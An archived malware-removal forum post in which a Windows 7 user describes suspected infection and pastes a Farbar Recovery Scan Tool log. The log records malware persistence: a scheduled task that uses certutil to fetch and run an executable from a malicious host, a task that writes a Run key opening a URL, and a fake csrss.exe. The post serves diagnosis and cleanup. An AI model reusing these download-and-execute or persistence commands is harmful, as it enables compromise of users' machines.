This is a read-only archive. No new posts or registrations. Privacy Page
Spyware / Malware / Virus Removal

Big Cleanup & Performance lag.

10 min read

This thread's last reply is from . Advice, software, and links below may be out of date — treat specific steps and download links with caution.

Looking for the outcome? Ask AI

Ok so I haven't really done a proper cleanup or even basic scans in quite a long time so I want to do a proper thorough one. Especially since I think I have viruses because of several things…I notice soon after computer starts that for a second or two some Windows executable black window opens to run something which is shady as hell. Also computer grinds to a halt sometime, usually after that happens and I am also connected online. Ending connection or opening task manager and performance checking seems to revert it though as if it's hiding but I noticed some kind of software about managing/monitoring running that I am pretty sure I didn't install. Performance lag aside I think it also affects my connectivity speed as well. I am sure there are others but those are the main issues I had for a little bit of time now.

Also I want and need to defragment my drives after this is done which is another thing I haven't done in ages, so if you all know any good options I'd appreciate it.

I'm on Windows 7 64 bit, and these are the logs:

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 30-09-2020
Ran by [removed] (administrator) on 4WATT (01-10-2020 01:24:55)
Running from C:\Users\[removed]\Desktop
[removed] Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\ASRock Utility\A-Tuning\Bin\IOMonitorSrv.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atiesrxx.exe
(Advanced Micro Devices, Inc.) [File not signed] C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(ASUSTeK Computer Inc.) [File not signed] C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtWLan.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTShellHlp.exe
(cFos Software GmbH -> cFos Software GmbH) C:\Program Files\ASRock\XFast LAN\cfosspeed.exe
(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\EFRService.exe
(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\Endpoint Security\Remediation\RemediationService.exe
(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\Endpoint Security\Threat Emulation\TESvc.exe
(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\ZAAR.exe
(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\ICM\ICM-Service-NET.exe
(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe
(Cole Williams Software Limited -> ) C:\Windows\SysWOW64\Codecs\TrayMenu.exe
(Comodo Security Solutions -> Comodo) [File not signed] C:\Program Files\Comodo\Dragon\dragon_updater.exe
(GOLD CLICK LIMITED -> Gold Click Ltd) C:\Program Files (x86)\ProxyGate\Cloud.exe
(GOLD CLICK LIMITED -> Gold Click Ltd) C:\Program Files (x86)\ProxyGate\PGChk.exe
(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Driver Booster\6.3.0\Scheduler.exe
(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\Pub\PubMonitor.exe
(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
(LAVASOFT SOFTWARE CANADA INC -> ) C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\schtasks.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Power Software Ltd) [File not signed] C:\Program Files\PowerISO\PWRISOVM.EXE
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor Corp.) [File not signed] C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtlService.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\…\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-10-19] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\…\Run: [XFast LAN] => C:\Program Files\ASRock\XFast LAN\cFosSpeed.exe [2009952 2013-05-31] (cFos Software GmbH -> cFos Software GmbH)
HKLM-x32\…\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [441856 2017-10-24] (Power Software Ltd) [File not signed]
HKLM-x32\…\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [34672 2008-06-12] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
HKLM-x32\…\Run: [ZoneAlarm] => C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe [325856 2020-01-23] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
HKLM-x32\…\Run: [Codec Settings UAC Manager] => C:\Windows\SysWOW64\Codecs\CodecUACManager.exe [71568 2020-01-04] (Cole Williams Software Limited -> )
HKLM-x32\…\Run: [ZaAntiRansomware] => C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\ZAAR.exe [4230368 2019-11-27] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
HKLM-x32\…\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [710264 2020-06-18] (Oracle America, Inc. -> Oracle Corporation)
HKLM\…\RunOnce: [dig1ubm3cpg] => C:\Program Files (x86)\wcze\206367889.exe [508416 2020-09-05] () [File not signed]
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Run: [Advanced SystemCare] => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [3636496 2020-03-06] (IObit Information Technology -> IObit)
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Run: [Ohm] => explorer.exe hxxp://exinariuminix.info <==== ATTENTION
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Run: [PatientBush] => C:\Windows\rss\csrss.exe [4055040 2020-09-26] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Run: [CloudNet] => C:\Users\Ohm\AppData\Roaming\3d03298b616c\3d03298b616c.exe [549376 2020-09-05] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\MountPoints2: G - G:\setup.exe
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\MountPoints2: J - J:\setup.exe
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\MountPoints2: {5089f4e2-306d-11ea-94e2-d0509953723f} - J:\Autorun.exe
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\MountPoints2: {5089f4e4-306d-11ea-94e2-d0509953723f} - K:\NoAutorun.exe
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\MountPoints2: {ca5833c8-09e7-11e9-a354-d0509953723f} - G:\HiSuiteDownLoader.exe
HKLM\…\Windows x64\Print Processors\BJ Print Processor4: C:\Windows\System32\spool\prtprocs\x64\CNBPP4.DLL [84992 2009-07-14] (Microsoft Windows -> CANON INC.)
HKLM\…\Print\Monitors\BJ Language Monitor4: C:\Windows\system32\CNBLM4.DLL [267776 2009-07-14] (Microsoft Windows -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\85.1.14.84\Installer\chrmstp.exe [2020-09-23] (Brave Software, Inc. -> Brave Software, Inc.)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\77.0.3865.90\Installer\chrmstp.exe" –configure-user-settings –verbose-logging –system-level
HKLM\Software\…\Authentication\Credential Providers: [{3AFAB1A7-F3DB-4DED-B51B-25E34D21D798}] -> C:\Windows\system32\USBKeyCredentialProvider.dll [2013-07-25] (ASROCK Incorporation -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2020-01-19]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\Codecs\TrayMenu.exe (Cole Williams Software Limited -> )
Startup: C:\Users\Ohm\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guard.lnk [2020-09-05]
ShortcutTarget: Guard.lnk -> C:\Users\Ohm\AppData\Roaming\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Guard.exe (Microsoft) [File not signed]
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0610C4BA-E28D-434F-A7A6-4344EA1208C0} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [154056 2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {1388E392-B751-40F1-BF63-7465A6EB2BF0} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [468992 2019-03-13] (Advanced Micro Devices, Inc.) [File not signed]
Task: {1CB47F2B-406C-42F6-B50C-3D9941839930} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-02-08] (Google Inc -> Google Inc.)
Task: {366DB73E-E78B-4751-BC71-A89166259168} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4055040 2020-09-26] () [File not signed] <==== ATTENTION
Task: {46E40779-0121-466B-9C29-7DCCD2A4483B} - System32\Tasks\AsrSP.exe => C:\Program Files (x86)\ASRock Utility\A-Tuning\Bin\AsrSP.exe [2461960 2014-05-27] (ASROCK Incorporation -> )
Task: {588065B8-4CEF-4E74-89A9-A708740CA49D} - System32\Tasks\Maxthon5 Update => C:\Program Files (x86)\Maxthon5\Bin\Maxthon.exe [170776 2020-02-25] (Maxthon Technology Co, Ltd. -> Maxthon International ltd.)
Task: {5E930F89-6898-42C6-A72D-142726432837} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-02-08] (Google Inc -> Google Inc.)
Task: {5FE0D1D6-CA49-45A5-9EC7-FE123B4F0469} - System32\Tasks\{C42FAC67-7005-46AC-A428-6A5D06984B65} => C:\Windows\system32\pcalua.exe -a C:\Wipefile\WipeFile.exe -d C:\Wipefile
Task: {62AD2886-BD33-4DF4-ABCD-2270C19B3350} - System32\Tasks\{40562C5C-A501-4E71-A94F-0CC76CBA9725} => C:\Windows\system32\pcalua.exe -a "D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME I\EAUninstall.exe"
Task: {70DC3C2D-AAB0-4333-820C-C9BD2BBDA272} - System32\Tasks\Games\UpdateCheck_S-1-5-21-546064741-869659242-2245885051-1000 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2016-04-19] (Microsoft Windows -> Microsoft Corporation)
Task: {92261E53-DB85-44D4-9F21-195C31A1B4D7} - System32\Tasks\{EBC6E330-304C-4DE2-9C7D-65FF1CD54893} => C:\Windows\system32\pcalua.exe -a F:\SETUP.EXE -d F:\
Task: {94E8E451-1F02-4B2D-92A7-500BD5E86407} - System32\Tasks\Driver Booster SkipUAC (Ohm) => C:\Program Files (x86)\IObit\Driver Booster\6.3.0\DriverBooster.exe [7424272 2019-02-19] (IObit Information Technology -> IObit)
Task: {9AD14568-CE1B-4F5C-ACC3-F850C825CEC7} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_433_pepper.exe [1497656 2020-09-09] (Adobe Inc. -> Adobe)
Task: {A12B0AAB-E424-4129-86D2-B6D4B90BFBCD} - System32\Tasks\{968E5A7B-F380-48CF-9963-F59954BAF532} => C:\Windows\system32\pcalua.exe -a C:\Windows\DIIUnin.exe -c C:\Windows\DIIUnin.dat
Task: {A7D5EBA9-DC71-4C8B-9428-A8369FFF8361} - System32\Tasks\Uninstaller_SkipUac_Ohm => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [6041360 2020-07-08] (IObit Information Technology -> IObit)
Task: {ABD8FE44-F99B-4A1A-9936-07E4B977AD2B} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [123600 2020-07-30] (Mozilla Corporation -> Mozilla Foundation)
Task: {B77AF2B6-D345-4D19-8644-B6E6C8759059} - System32\Tasks\{ADC85419-F2DF-47EA-919B-08E5AF637BE1} => C:\Windows\system32\pcalua.exe -a "C:\KITT ENDS!\JAVA!\jre-8u251-windows-i586.exe" -d "C:\KITT ENDS!\JAVA!"
Task: {B9EB39FE-8A7C-4FFB-9FC0-CB3D9D15E194} - System32\Tasks\{844D974E-ACE4-4B35-802B-E31E516B5283} => C:\Windows\system32\pcalua.exe -a "D:\StAllIns!!\GAMES2!!\Command & Conquer!\CnC3 Kanes Wrath\WorldBuilder.exe" -d "D:\StAllIns!!\GAMES2!!\Command & Conquer!\CnC3 Kanes Wrath"
Task: {C5EA2CF0-651C-4502-B200-4B3AE8226F8F} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [58760 2019-03-12] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {C86975B4-515F-4E42-8CDD-C9EEA42F2593} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe [468992 2019-03-13] (Advanced Micro Devices, Inc.) [File not signed]
Task: {C91F2EAE-AC2F-40E2-8819-B210AC2F9211} - System32\Tasks\{DFEDADEA-B75E-4109-9752-FBEA26DFE40F} => C:\Windows\system32\pcalua.exe -a F:\WinterAssault.exe -d F:\
Task: {C920CA0D-9D5F-423B-8124-E73719CEBDAE} - System32\Tasks\ASC_SkipUac_Ohm => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [8884496 2020-03-26] (IObit Information Technology -> IObit)
Task: {C958D574-ED9E-424F-B2D0-DADA4F5A739A} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://babsitef.com/app/app.exe C:\Users\Ohm\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Ohm\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {C9E6A47F-AB90-4570-B548-6662DCEA1DBD} - System32\Tasks\SystemMaintanceTask => C:\Users\Ohm\AppData\Roaming\Battlefleet.Gothic.Armada.v1.8.10317+3DLC\dttdxdkt.exe
Task: {D61A4D7D-9025-4EDE-B76D-B461B105E130} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [154056 2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {DE4C3896-37D1-43EE-A99B-1A3FEBED5A42} - System32\Tasks\FRAPS => C:\Fraps\fraps.exe [2550968 2012-08-30] (Beepa Pty Ltd -> Beepa P/L) [File not signed]
Task: {E4689906-8CE5-4FE4-9037-CB1C6A1499CA} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe
Task: {E708FF18-830A-4206-A150-62F4428D9ED6} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-09] (Adobe Inc. -> Adobe)
Task: {EA1CEBF7-3A0B-4D44-92FF-9946EC0374D7} - System32\Tasks\StartCNBM => C:\Program Files\AMD\CNext\CNext\cncmd.exe [58760 2019-03-12] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {F7C4F3CB-85F6-48BE-9A8A-7D5E45E35E9E} - System32\Tasks\{1918CEA6-941B-49B5-B05C-B242183C1EBD} => C:\Windows\system32\pcalua.exe -a G:\setup.exe -d G:\
Task: {F7FA602A-068D-43BF-9845-2F0717CB7492} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\6.3.0\Scheduler.exe [149776 2018-12-28] (IObit Information Technology -> IObit)
Task: {FE95BE9B-48DD-4911-B935-726A26FBF6D2} - System32\Tasks\{FF3E8B37-F18A-407C-9CE6-55A13DCC381F} => C:\Windows\system32\pcalua.exe -a "D:\GGGottem!\TRAINERS!\TRAINERS!\RA2YR!\AZ Yuri Hack 2.exe" -d D:\GGGottem!\TRAINERS!\TRAINERS!\RA2YR!
Task: {FF7440FF-5D97-480D-B1A4-A6269A7B4EC8} - System32\Tasks\Ohm => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Ohm /t REG_SZ /d "explorer.exe hxxp://exinariuminix.info" <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{2863B861-F8BB-4B80-B5E7-42172F5623FD}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{49703120-71B3-413E-8DFE-64718E2F611B}: [DhcpNameServer] 192.168.0.1
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION

FireFox:
========
FF DefaultProfile: 88ekh0t2.default
FF DefaultProfile: u614m3x9.default
FF DefaultProfile: s6poxj0c.default
FF DefaultProfile: ltvqy08k.default
FF ProfilePath: C:\Users\Ohm\AppData\Roaming\Waterfox\Profiles\88ekh0t2.default [2020-10-01]
FF ProfilePath: C:\Users\Ohm\AppData\Roaming\Mozilla\SeaMonkey\Profiles\u614m3x9.default [2020-10-01]
FF ProfilePath: C:\Users\Ohm\AppData\Roaming\Mozilla\Firefox\Profiles\s6poxj0c.default [2020-10-01]
FF NewTab: Mozilla\Firefox\Profiles\s6poxj0c.default -> hxxp://securedsearch.lavasoft.com/?pr=vmn&id;=webcompa&ent;=hp_WCYID10449__190316
FF Notifications: Mozilla\Firefox\Profiles\s6poxj0c.default -> hxxps://fitgirl-repacks.site
FF Extension: (Worldwide Radio) - C:\Users\Ohm\AppData\Roaming\Mozilla\Firefox\Profiles\s6poxj0c.default\Extensions\[removed] [2020-05-11]
FF Extension: (Image Search Options) - C:\Users\Ohm\AppData\Roaming\Mozilla\Firefox\Profiles\s6poxj0c.default\Extensions\{4a313247-8330-4a81-948e-b79936516f78}.xpi [2019-10-08]
FF Extension: (Flash and Video Download) - C:\Users\Ohm\AppData\Roaming\Mozilla\Firefox\Profiles\s6poxj0c.default\Extensions\{adeadebb-fedc-4180-a7f4-cfdd87496551}.xpi [2020-06-09]
FF ProfilePath: C:\Users\Ohm\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles\ltvqy08k.default [2020-09-18]
FF SearchPlugin: C:\Users\Ohm\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles\ltvqy08k.default\searchplugins\jive-search.xml [2020-09-18]
FF Plugin: @java.com/DTPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\plugin2\npjp2.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.261.2 -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.261.2 -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\plugin2\npjp2.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @tools.brave.com/BraveSoftware Update;version=3 -> C:\Program Files (x86)\BraveSoftware\Update\1.3.99.0\npBraveUpdate3.dll [2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)
FF Plugin-x32: @tools.brave.com/BraveSoftware Update;version=9 -> C:\Program Files (x86)\BraveSoftware\Update\1.3.99.0\npBraveUpdate3.dll [2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)
FF Plugin-x32: BYOND -> C:\Program Files (x86)\BYOND\bin\npbyond.dll [2008-07-09] (BYOND) [File not signed]
FF Plugin HKU\S-1-5-21-546064741-869659242-2245885051-1000: @updates.epicbrowser.com/Epic Privacy Browser Installer;version=3 -> C:\Users\Ohm\AppData\Local\Epic Privacy Browser\Installer\1.3.27.13\npEpicUpdate3.dll [2018-04-14] (Google Inc (TEST) -> Epic Privacy Browser) [File not signed]
FF Plugin HKU\S-1-5-21-546064741-869659242-2245885051-1000: @updates.epicbrowser.com/Epic Privacy Browser Installer;version=9 -> C:\Users\Ohm\AppData\Local\Epic Privacy Browser\Installer\1.3.27.13\npEpicUpdate3.dll [2018-04-14] (Google Inc (TEST) -> Epic Privacy Browser) [File not signed]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default [2020-09-19]
CHR StartupUrls: Default -> "hxxps://us.yahoo.com/?fr=fpc-comodo&type;=81_25050030006_77.0.3865.120_u_hp_sp"
CHR Extension: (Flash Video Downloader Plus) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\alfnggielnhdpdamedeokgppcilgainm [2020-04-04]
CHR Extension: (Full History Keeper) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\cailfpeoajpebgkchjnmpopcileaeklm [2020-09-18]
CHR Extension: (Export History/Bookmarks to JSON/CSV*/XLS*) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\dcoegfodcnjofhjfbhegcgjgapeichlf [2020-09-18]
CHR Extension: (User-Agent Switcher for Chrome) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\djflhoibgkdhkhhcedjiklpkjnoahfmg [2020-07-09]
CHR Extension: (Flash Downloader) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\eepdaplnjgknikdfmmiihcohocmpmimg [2020-06-18]
CHR Extension: (History Saver) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\egmmpalpkmlamglljdhaiclcggaomepi [2020-09-18]
CHR Extension: (EditThisCookie) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2020-09-18]
CHR Extension: (Awesome Cookie Manager) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcpidejphgpcgfnpiehkcckkkemgneif [2020-09-18]
CHR Extension: (Flash Downloader) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\hoageakflbgkobikeakdpilfejhdaggh [2019-01-16]
CHR Extension: (Darkness - Beautiful Dark Themes) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\imilbobhamcfahccagbncamhpnbkaenm [2019-10-08]
CHR Extension: (Video Downloader professional) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpaglkhbmbmhlnpnehlffkgaaapoicnk [2019-05-19]
CHR Extension: (User Agent Switcher) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\kchfmpdcejfkipopnolndinkeoipnoia [2020-09-18]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (Chrome Media Router) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-08-27]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AdobeFlashPlayerUpdateSvc; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-09] (Adobe Inc. -> Adobe)
R2 AdvancedSystemCareService13; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [1290000 2019-12-27] (IObit Information Technology -> IObit)
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-04-02] (Advanced Micro Devices, Inc.) [File not signed]
S3 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [190464 2019-03-12] () [File not signed]
R2 ASRockIOMon; C:\Program Files (x86)\ASRock Utility\A-Tuning\Bin\IOMonitorSrv.exe [454656 2013-07-25] () [File not signed]
S3 AUEPLauncher; C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe [43008 2019-03-12] (AMD) [File not signed]
S3 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [154056 2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [154056 2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 cFosSpeedS; C:\Program Files\ASRock\XFast LAN\spd.exe [652640 2013-05-31] (cFos Software GmbH -> cFos Software GmbH)
R2 CPEFR; C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\EFRService.exe [2825976 2019-11-27] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
S3 CpSbaCipolla; C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\SBACipollaSrvHost.exe [33016 2019-10-29] (Check Point Software Technologies Ltd. -> )
S3 CpSbaUpdater; C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\SBACipollaSrvHost.exe [33016 2019-10-29] (Check Point Software Technologies Ltd. -> )
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [4506728 2020-01-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 DragonUpdater; C:\Program Files\Comodo\Dragon\dragon_updater.exe [2971640 2020-07-16] (Comodo Security Solutions -> Comodo) [File not signed]
S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [1677384 2020-07-21] (GOG Sp. z o.o. -> GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6821960 2020-05-06] (GOG Sp. z o.o. -> GOG.com)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
S2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [156944 2020-07-08] (IObit Information Technology -> IObit)
S3 MaskVPNService; C:\Program Files (x86)\MaskVPN\mask_svc.exe [7461816 2020-07-02] (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6347056 2018-09-19] (Malwarebytes Corporation -> Malwarebytes)
S2 MxService; C:\Program Files (x86)\Maxthon5\Bin\MxService.exe [178464 2020-02-25] (Maxthon Technology Co, Ltd. -> Maxthon International ltd.)
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (GOLD CLICK LIMITED -> Gold Click Ltd) <==== ATTENTION
S3 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2020-09-06] (Even Balance, Inc. -> )
S3 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [183112 2020-09-06] (Even Balance, Inc. -> )
